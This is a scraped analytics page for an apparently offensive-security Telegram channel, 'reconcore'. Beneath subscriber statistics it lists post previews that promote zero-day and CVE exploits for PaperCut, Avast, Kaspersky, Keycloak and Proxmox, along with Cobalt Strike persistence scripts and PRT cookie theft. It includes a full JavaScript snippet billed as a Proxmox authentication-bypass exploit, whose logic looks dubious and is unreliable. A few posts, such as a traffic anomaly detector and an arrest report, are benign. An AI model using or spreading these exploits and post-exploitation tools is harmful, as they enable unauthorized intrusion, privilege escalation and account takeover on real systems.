ch
Feedback
reconcore

reconcore

前往频道在 Telegram

#vulnerability #research #cve #rce #lpe #poc #tools #pentest #redteam #blueteam #offensivesecurity #technique #methods Educational use only. Content from public sources. Admin holds no liability for misuse. Users are solely responsible for their actions.

显示更多
2 418
订阅者
-124 小时
+67 天
+9330 天
吸引订阅者
九月 '26
九月 '26
+7
在0个频道中
八月 '26
+136
在1个频道中
Get PRO
七月 '26
+122
在0个频道中
Get PRO
六月 '26
+159
在2个频道中
Get PRO
五月 '26
+92
在2个频道中
Get PRO
四月 '26
+89
在2个频道中
Get PRO
三月 '26
+116
在1个频道中
Get PRO
二月 '26
+145
在1个频道中
Get PRO
一月 '26
+157
在2个频道中
Get PRO
十二月 '25
+317
在3个频道中
Get PRO
十一月 '25
+170
在0个频道中
Get PRO
十月 '25
+216
在1个频道中
Get PRO
九月 '25
+125
在2个频道中
Get PRO
八月 '25
+118
在5个频道中
Get PRO
七月 '25
+96
在2个频道中
Get PRO
六月 '25
+51
在1个频道中
Get PRO
五月 '25
+68
在3个频道中
Get PRO
四月 '25
+117
在2个频道中
Get PRO
三月 '25
+84
在1个频道中
Get PRO
二月 '25
+108
在1个频道中
Get PRO
一月 '25
+73
在2个频道中
Get PRO
十二月 '24
+4
在0个频道中
Get PRO
十一月 '24
+127
在0个频道中
Get PRO
十月 '24
+38
在0个频道中
Get PRO
九月 '24
+37
在0个频道中
Get PRO
八月 '24
+328
在0个频道中
Get PRO
七月 '240
在0个频道中
Get PRO
六月 '24
+15
在1个频道中
日期
订阅者增长
提及
频道
02 九月+2
01 九月+5
频道帖子
Proxmox VE PVE 7.4 auth-bypass exploit // PVE 7.4 auth-bypass @reconcore 2026 // First, make sure to try logging in as root w
Proxmox VE PVE 7.4 auth-bypass exploit
// PVE 7.4 auth-bypass @reconcore 2026
// First, make sure to try logging in as root with this exact password: root@pam
(async () => {
    const form = new URLSearchParams({
        username: "root@pam",
        password: "root@pam",
        "tfa-challenge": "RECONCORE-CHALLENGE",
    });
    const loginResponse = await fetch("/api2/json/access/ticket", {
        method: "POST",
        credentials: "omit",
        headers: { "Content-Type": "application/x-www-form-urlencoded;charset=UTF-8" },
        body: form,
    });
    const loginBody = await loginResponse.json();
    document.cookie = `PVEAuthCookie=${loginBody?.data?.ticket}; Path=/; Secure; SameSite=Strict`;
    location.reload()
})();
#bypass @reconcore

2
Exploit module for the recent PaperCut MF/NG 0day CVE-2026-81578 + CVE-2026-82078 Module supports both MF and NG editions, an
Exploit module for the recent PaperCut MF/NG 0day CVE-2026-81578 + CVE-2026-82078 Module supports both MF and NG editions, and all supported product versions 26.x, 25.x, 24.x. Bypasses vendor emergency patch v1. Emergency patch v2 successfully remediates the chain. Module also has platform agnostic Java payload support (and that will be in-memory on 26.x targets), along with OS command based payloads. PaperCut NG/MF Critical Zero-Day Exploited in the Wild #vulnerability #payload #zeroday #bypass @reconcore
284
3
NoMoreSACL Enumerate User and Computer Objects via SAMR Protocol and Evade SACL Logging simultaneously #poc #ad @reconcore
342
4
C2 Traffic Anomaly Detector Скрипт продавался за 1200$ а на многих «закрытых форумах» и сейчас продается. - Анализирует PCAP-файлы (дампы трафика). - Ищет аномальные DNS-запросы (DGA, длинные поддомены, low TTL). - Обнаруживает подозрительные TLS сертификаты (самоподписанные, срок < 7 дней, необычные issuer). - Выявляет регулярные интервалы между пакетами (beaconing). - Строит граф связей между внутренними IP и внешними хостами. этот скрипт — инструмент для анализа сетевого трафика (PCAP-файлов) с целью обнаружения признаков C2-коммуникации. Он не атакует, не взламывает, не обходит защиту. Он читает сохранённый трафик и ищет в нём аномалии, которые могут указывать на работу вредоносного ПО (бэкдоры, RAT, майнеры, шифровальщики) или на утечку данных.
2
5
C2 Traffic Anomaly Detector Скрипт продавался за 1200$ а на многих «закрытых форумах» и сейчас продается. - Анализирует PCAP-файлы (дампы трафика). - Ищет аномальные DNS-запросы (DGA, длинные поддомены, low TTL). - Обнаруживает подозрительные TLS сертификаты (самоподписанные, срок < 7 дней, необычные issuer). - Выявляет регулярные интервалы между пакетами (beaconing). - Строит граф связей между внутренними IP и внешними хостами. этот скрипт — инструмент для анализа сетевого трафика (PCAP-файлов) с целью обнаружения признаков C2-коммуникации. Он не атакует, не взламывает, не обходит защиту. Он читает сохранённый трафик и ищет в нём аномалии, которые могут указывать на работу вредоносного ПО (бэкдоры, RAT, майнеры, шифровальщики) или на утечку данных.
2
6
PrettyPrague GenDigital Avast Antivirus ZeroDay Elevation of Privileges Vulnerability Another zeroday in an antimalware provi
PrettyPrague GenDigital Avast Antivirus ZeroDay Elevation of Privileges Vulnerability Another zeroday in an antimalware provider, I'm not sure but I believe this vulnerability affect other GenDigital products as well (such as AVG, Norton...) For now the PoC is compatible with any version of Avast Antivirus. The PoC will dump the SAM database by abusing a vulnerability in Avast Sandbox and spawn a full SYSTEM shell, at the time of writing this the PoC works with fully patched Avast Antivirus + Patched Windows 11 25H2 #vulnerability #elevate #poc #zeroday #av @reconcore
388
7
HardBreacher Kaspersky Antivirus For Endpoint ZeroDay Elevation of Privileges Vulnerability #vulnerability #zeroday #elevatio
HardBreacher Kaspersky Antivirus For Endpoint ZeroDay Elevation of Privileges Vulnerability #vulnerability #zeroday #elevation @reconcore
450
8
PRTremote Extract PRT cookies remotely with InteractiveToken Scheduled Tasks PRTremote: Extract PRT Cookies Remotely with Int
PRTremote Extract PRT cookies remotely with InteractiveToken Scheduled Tasks PRTremote: Extract PRT Cookies Remotely with InteractiveToken Scheduled Tasks #technique #injection #ad @reconcore
509
9
Manic: Blend between Banking Malware & Spyware is a new Android banking malware and mobile spyware: https://www.threatfabric.com/blogs/manic-blend-between-banking-malware-and-spyware
473
10
CVE-2026-72137 ubuntu-7.0.0-28 #cve #linux #lpe @reconcore
CVE-2026-72137 ubuntu-7.0.0-28 #cve #linux #lpe @reconcore
490
11
Two members of TeamPCP, Ruben Ian Thomson, 21, and Louis Michael Gaebler, 23, were arrested in Perth, Australia. The group is+1
Two members of TeamPCP, Ruben Ian Thomson, 21, and Louis Michael Gaebler, 23, were arrested in Perth, Australia. The group is known for its attacks on the npm supply chain, including the Shai-Hulud worm.
457
12
CobaltStrike_CNA 使用多种WinAPI进行权限维持的CobaltStrike脚本,包含API设置系统服务,设置计划任务,管理用户等。 #adduser #plugin #pentest #sheduler #wmi @reconcor
CobaltStrike_CNA 使用多种WinAPI进行权限维持的CobaltStrike脚本,包含API设置系统服务,设置计划任务,管理用户等。 #adduser #plugin #pentest #sheduler #wmi @reconcore
460
13
CS-EDR-Enumeration Cobalt Strike Aggressor Script for identifying security products on Windows hosts — six enumeration methods rated by noise level, from silent in-process BOF to full PowerShell/WMI. #aggressor #bof #edr #post_exploitation #offensivesecurity #purpleteam #redteam @reconcore
459
14
CS-EDR-Enumeration 🛡 Enumerate AV, EPP, EDR, and telemetry on Windows hosts using low-noise Cobalt Strike commands for tailored risk-based assessment. #aggressor #bof #edr #post_exploitation #offensivesecurity #purpleteam #redteam @reconcore
439
15
broke Pyarmor with Frida to recover JavaScript malware payloads
454
16
Microsoft Entra ID Remote Code Execution Vulnerability #vulnerability #security @reconcore
511
17
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-69836
13
18
ᴄʏʙᴇʀsᴘᴀᴄᴇ sᴏꜰᴛᴡᴀʀᴇ ᴄᴏᴍᴍᴀɴᴅ ᴀɴᴅ ᴄᴏɴᴛʀᴏʟ ──────────────────── ʀᴇᴄᴏɴ ᴄᴏʀᴇ ʟᴀʙ
ᴄʏʙᴇʀsᴘᴀᴄᴇ sᴏꜰᴛᴡᴀʀᴇ ᴄᴏᴍᴍᴀɴᴅ ᴀɴᴅ ᴄᴏɴᴛʀᴏʟ ──────────────────── ʀᴇᴄᴏɴ ᴄᴏʀᴇ ʟᴀʙ
522
19
Two Zero-Days in the DrayTek Vigor2962 Router #zeroday #router @reconcore
Two Zero-Days in the DrayTek Vigor2962 Router #zeroday #router @reconcore
527
20
CVE-2026-18963-Exploit — Keycloak reset-credentials bypass → unauthenticated account takeover Knowing only a username or e-ma
CVE-2026-18963-Exploit — Keycloak reset-credentials bypass → unauthenticated account takeover Knowing only a username or e-mail address, an unauthenticated attacker sets an arbitrary password on any Keycloak account. The password-reset e-mail is delivered to the real victim and is never needed — the attacker never reads a mailbox, never clicks a link, and holds no prior credential or session. Affected: Keycloak 26.0.0 – 26.7.1. Fixed in 26.7.2. #vulnerability #cve #auth #bypass #poc @reconcore
541